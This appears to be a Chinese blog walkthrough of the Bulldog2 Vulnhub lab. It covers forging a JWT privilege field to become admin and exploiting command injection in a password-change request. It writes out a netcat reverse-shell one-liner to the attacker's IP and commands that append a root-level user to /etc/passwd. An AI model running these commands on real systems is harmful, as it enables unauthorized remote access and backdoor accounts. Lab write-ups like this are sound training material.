bulldog2

最新推荐文章于 2021-10-30 12:11:50 发布
最新推荐文章于 2021-10-30 12:11:50 发布
阅读量546 收藏
点赞数
分类专栏: 渗透测试 靶机
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/haha13l4/article/details/90436839
版权

一、 信息收集
1、 发现主机
在这里插入图片描述
发现有两个ip,尝试之后,都可以登录
下面采取192.168.88.132做测试
2、 检测端口
在这里插入图片描述
3、 探测指纹
在这里插入图片描述
二、 web渗透
1、 发现一个登陆和注册页面
在这里插入图片描述
但是并不能注册,也不能登陆。
2、 发现有js源代码泄露
在这里插入图片描述
发现需要name—email—username—password
3、 登陆抓包分析,看能不能注册。
在这里插入图片描述
在这里插入图片描述
3.1、尝试在后面加和姓名和邮箱
在这里插入图片描述
3.2、尝试登陆
在这里插入图片描述
但是发现并不能找到一些有用信息,可能是普通用户。
3.3、抓包登陆,尝试垂直越权。
垂直越权和水平越权不懂的看看下面的链接
在这里插入图片描述
返回包 带有一个JWT开头的token字段;这个token传递了什么信息呢;
JWT(Json Web Token)的声明,一般用于身份提供者和服务提供者间,来传递被认证的用户身份信息,以便从资源服务器获取资源,也可以增加一些额外的其他业务逻辑所必须的声明信息,该token也可直接被用于认证或被加密;
3.4查看token信息;
在这里插入图片描述
可以看到有个auth_level的参数,通过名字可以看出是关于用户权限的,我们可以使用这个参数去在js文件中进行搜索;
在这里插入图片描述
3.5 将回包中的standard_user替换成master_admin_user;将回包中的编码替换
在这里插入图片描述
退出账号并重新登录,抓包——>Do intercept——>response to this request;
在这里插入图片描述
然后forward,获取如下页面,复制修改后的新编码替换原来的编码,注:后面明文处也要修改成“master_admin_user”,然后一直forward;
在这里插入图片描述
在这里插入图片描述
3.6最后垂直越权成功,此时账号为admin
在这里插入图片描述
4、 获取shell
在这里插入图片描述
抓包分析
在这里插入图片描述
在这里插入图片描述
发现不管输入什么都是返回200,所以存在命令注入
直接在修改密码处执行漏洞拿反弹shell;
4.2、在kali监听
在这里插入图片描述
4.3、此处的反弹shell为:rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.88.141 33333 >/tmp/f;
在这里插入图片描述
4.4、反弹成功
在这里插入图片描述
三、 提权
在这里插入图片描述
得到passwd的权限为777
1、 创建一个新用户
perl -le ‘print crypt(“dayu”,“aa”)’
在这里插入图片描述
aa表示使用的加密盐(可以有aa,sa,Fx等),如果不使用加密盐,那么输出的字符串将不是crypt加密格式,而是MD5加密格式的。所以,加密盐其实是必须的参数
2、 将新创建的用户写到passwd文件中;
echo ‘dayu: aaP.3CTQfJaLg:0:0:dayu:/root:/bin/bash’ >>/etc/passwd
在这里插入图片描述
3、 切换用户
在这里插入图片描述
Okok

haha13l4
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
靶机渗透(三)bulldog2
qq_42180996的博客
04-26 935
靶机bulldog2 一、实验环境 二、实验步骤 (一)信息收集 1.开启靶机,查看IP 2.查询测试机IP地址,判断所处网段 3.主机发现(netdiscover) 4.端口扫描(masscan/namp) (二)Web渗透 1.浏览Web网页 2.网站指纹信息扫描(whatweb) 3.查询服务器版本信息(searchsploit) 4.目录扫描(dirb) 5...
靶机渗透(一)——bulldog2
qq_45751902的博客
04-16 2190
一、靶机下载 靶机下载地址:https://download.vulnhub.com/bulldog/Bulldog2.ova 二、bulldog2靶机搭建 将刚刚下载完成的bulldog2.ova导入到VM VirtualBox,并且修改靶机的网络,注意红框,下面能用到 修改完打开就是这样的 三、kali攻击机 打开vmware中的虚拟网络编辑器,将kali网络类型配置成桥接模式,桥接至(不要自动,找到靶机的页面名称) 四、攻击 1.在kali上查看ip ifconfig 发现ip地址为192.1
Bulldog:2靶机渗透
weixin_34345560的博客
02-07 283
文章首发圈子社区:https://www.secquan.org/Notes/1068825 前言 前两天做了一个靶机渗透题目,在此记录一下 靶机信息: 靶机名称 Bulldog:2 渗透步骤: 一、获取靶机IP 成功搭建靶机后,界面显示了ip地址: 但如果靶机没有显示ip,可以用nmap扫描网段得到ip。 二、浏览网站 网站的功能很简单,注册、登录以及浏览一些...
bulldog2--靶机渗透
weixin_44769042的博客
10-30 341
靶机记录--7 目录 分配ip 主机发现 端口扫描 服务版本,操作系统扫描 开始渗透 水平越权 垂直越权 反弹shell 尝试提权 得到flag 总结 分配ip 这个靶机的IP要重新分发(dhclient) 主机发现 端口扫描 这里扫到两个ip,但是mac地址相同,扫一个就行 服务版本,操作系统扫描 开始渗透 1> 来到主页,有登陆点,注册点 2> 来到登陆点,万能密码,弱口令,暴力破解走一波 3...
靶机渗透----bulldog2
Z_Grant的博客
10-09 485
文章目录测试流程一,信息收集(1)nmap扫描端口..................................................???? 通过靶机学习到的知识(1)node.js 测试流程 一,信息收集 (1)nmap扫描端口 … ???? 通过靶机学习到的知识 (1)node.js node:Node 是一个让 JavaScript 运行在服务端的开发平台,它让 JavaScrip...
BULLDOG-开源
05-27
Bulldog是WFMC兼容的开源,Apache样式许可的工作流解决方案,可在J2EE容器中运行。
bulldog_shop
05-09
自述文件 该自述文件通常会记录启动和运行应用程序所需的所有步骤。 您可能要讲的内容: Ruby版本 系统依赖 配置 数据库创建 数据库初始化 如何运行测试套件 服务(作业队列,缓存服务器,搜索引擎等) ...
vuInhub靶场实战系列-bulldog-1
最新发布
06-03
vuInhub靶场实战系列-bulldog-1
Bulldog-Bucks:一个用于管理Gonzaga的Bulldog Bucks的Android应用程序
05-14
Bulldog Bucks专为Gonzaga大学的学生设计,可快速轻松地管理他们的Bulldog Bucks。 这个Android应用程式的灵感来自创建 。 学生ID和PIN仅在本地存储在移动设备上。 从安装android应用程序,或从此存储库下载源...
British Bulldog Themes & New Tab-crx插件
03-16
安装扩展程序后,每次启动浏览器选项卡时,您将拥有一个新的British Bulldog。 我们的目标是为世界各地的人们带来出色的新标签。 让我们的团队为您提供新的屏幕标签,让您的生活栩栩如生。 每个新标签页都是真正的...
靶机渗透测试实战(四)——Bulldog2渗透实战
橘子女侠
05-10 2851
目录 一. 实验环境 二. 实验流程 三. 实验步骤 (1)信息收集——主机发现 (2)信息收集——端口扫描 (3)信息收集——操作系统扫描 (4)渗透测试 四. 实验总结 一. 实验环境 靶机:Bulldog2 IP地址暂时未知; 测试机:kali IP地址:192.168.37.131 测试机:物理机win7 二. 实验流程 信息收集——主机发现 信息...
【渗透项目】Bulldog2网站渗透
命运的旋律的博客
12-13 424
Bulldog2网站渗透 文章目录Bulldog2网站渗透渗透过程主机发现端口扫描服务扫描获取网站指纹信息扫描网页目录信息整理筛选页面元素审查尝试注册用户进行水平越权进行垂直越权逻辑漏洞利用反弹SHELL提权 渗透过程 靶机:IP地址未知 测试机kali:ip192.168.72.141 主机发现 通过主机发现,发现了192.168.72.145和192.168.72.146两个IP 端口扫描 ...
【安全狐】靶机渗透_bulldog2(附下载靶机地址)
安全狐
12-22 562
一、主机发现 方法1 nmap -sn 192.168.106.0/24 方法二 netdiscover 主动:netdiscover -i eth0 -r 192.168.106.0/24 二、端口扫描(masscan/nmap) masscan --rate=10000 --ports 0-65535 192.168.106.132 发包数默认为100个 三、端口服务 服务确认 nmap -sV -T4 -O -p 8080,23,80 IP -sV服...
Vulnhub-Bulldog2 靶机渗透
Majula
02-04 325
WalkthroughDownloadDescriptionPen TestingScanningExploitationSolution ISolution IIPrivilege EscalationReview Download BULLDOG: 2 - VlunHub 靶机详细配置参考 Vulnhub-Bulldog1 靶机渗透 这篇文章,此篇不再赘述。 同样,启动靶机显示 IP 才算配置成功。 Description This is a Standard Boot-to-Root. Your
【vulnhub】--- bulldog2靶机
qq_43168364的博客
08-21 391
目录 一、实验环境 靶机:bulldog2靶机(192.168.1.102、192.168.1.105) 攻击机:kali Linux(192.168.1.104) 二、靶机设置 我们首先进行登录 我们发现登录进去之后靶机是没有IP地址的,我们看看它的网卡配置文件。 这里网卡设置的是dhcp,我们可以通过dhclient命令来获取IP。建议设置为桥接。 现在两个网卡就都有IP地址了。接下来就可以进行渗透了。 三、信息收集 首先用nmap进行主机发现,命令:nmap -sn 192.168.1.
bulldog2 靶机渗透
Sher__lock的博客
12-18 309
bulldog2 靶机渗透 1.先做主机发现 2.查看目标靶机开通的服务,发现目标靶机只开通了80端口 3.使用http服务登录主页 4.发现网站关闭了注册功能 5.发现用户遍历漏洞 6.查看下载好的源码,获取用户名 7.使用burpsuite抓用户登录的包,然后改包,创建一个新的用户 8.创建一个新的账户fxh 9.可以水平越权,使用注册好的用户账号登录,并抓包,发现密码是明...
渗透测试实战2--bulldog2靶机入侵
qq_45070118的博客
08-08 439
信息收集 用户先登录,用dhclient自动获取ip Kali Nmap扫描 nmap -sn 192.168.10.1/24 扫描端口 masscan --rate=10000 --ports 0-65535 192.168.10.133 扫描开放端口的详细信息 nmap -sV -T4 -p 80 192.168.10.133 searchsploit nginx 网站版本 ka...
渗透测试实战3——bulldog2靶机入侵
浅浅的博客
04-25 893
一、实验环境 Kali攻击机:192.168.247.149 bulldog 2靶机:192.168.247.150、(192.168.247.151) 开始之前,需先登录bulldog2。账号:dirty,密码:pass,并使其获取IP 二、实验步骤 (一)主动信息收集 1、扫描存活主机 2、扫描开放端口(192.168.247.150和192.168.247.151开...
Bulldog1
haha1314的博客
05-20 661
一、 收集信息 1、 扫描存活主机,找到目标机的ip 2、 扫描目标机的端口信息。 说明可以通过80或8080来访问它 3、 查看一些指纹信息 4、因为是自己搭的所以不需要被动收集 二、 web渗透 1、通过访问发现没有神什么可用信息,就两个页面,审查里面元素也没有可用信息。 2、 扫目录 扫出来目录不多,可以打开看看,也可以用自己的字典 多了一条 http://192.168.88...
实现一个双向适配器实例,使得猫(Cat)可以学狗(Dog)叫,狗可以学猫抓老鼠。绘制相应类图并使用代码编程模拟。
04-01
bulldog = Bulldog() cat = Cat() adapter = DogAdapter(bulldog) print(adapter.catch_mice()) # Output: Woof! Woof! ``` 在上面的代码中,我们有一个Target接口 `Cat`,它定义了一个`catch_mice()`方法,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值